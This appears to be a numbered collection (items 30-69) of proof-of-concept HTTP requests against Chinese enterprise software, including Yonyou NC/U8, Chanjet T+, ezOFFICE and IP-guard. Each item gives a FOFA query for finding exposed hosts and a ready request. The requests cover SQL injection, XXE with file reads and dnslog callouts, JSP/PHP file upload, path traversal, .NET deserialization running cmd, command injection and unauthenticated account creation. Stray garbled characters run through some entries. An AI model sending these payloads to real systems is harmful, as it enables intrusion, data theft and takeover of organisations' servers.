  e2 B" d: a* a( @. A
+ V, [+ k3 e2 I4 c* }! W% I' T
30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

" J# |" J, {% e: m2 t4 ?4 o38. 用友U8 Cloud smartweb2.RPC.d XXE
* w) _7 E( w# o# J. q# zFOFA:app="用友-U8-Cloud"
& |* x) _% _" i- Y& l: R; hPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1% _: V0 I/ B8 R1 o
Host: 192.168.40.131:8088
  p* V9 S9 k' ~4 j6 }# Z( WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25* o1 {- V! J. h/ }' k6 Z2 l
Content-Length: 260
$ A3 z( z3 L5 `" j0 j& TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
1 }8 A; G4 i+ T( F& e; g7 VAccept-Encoding: gzip, deflate
  B% O5 O# o+ I* w2 i+ l- ~8 pAccept-Language: zh-CN,zh;q=0.92 u  X4 Z3 f* b% a5 ]0 U
Connection: close
6 n, [/ c8 H  `9 eContent-Type: application/x-www-form-urlencoded, w0 ^3 V: y' M/ K, R8 {1 f' I
- o1 X8 n3 U5 P. W  T
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
  S* z- u) X3 c9 `+ o6 c2 ]
" @" a4 C3 L& ]- p/ H1 t/ ?: u9 x) m  ?, o5 @  @
39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

: O$ @" t) {/ k" P# ~40. 用友U8-Cloud XChangeServlet XXE) A; J$ t/ @6 H) M4 Y
FOFA:app="用友-U8-Cloud"
  h+ F7 B* I& N. XPOST /service/XChangeServlet HTTP/1.17 i5 v1 k$ |- w; D7 i
Host: x.x.x.x
, d4 S) I. ~5 U9 ?User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% y/ ~# i1 H4 s- sContent-Type: text/xml
. k% E% D- @: AConnection: close2 u" x: t; d0 a/ C

3 S7 ~5 V) |7 g& l6 e9 p<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
- T- T6 m8 r, T) |) [' b  E9 o2 |  Y0 R/ }+ {/ P! B% e; w
! Y7 C# v6 q' ^. `! m
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then reachable at:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: access the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword endpoint
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


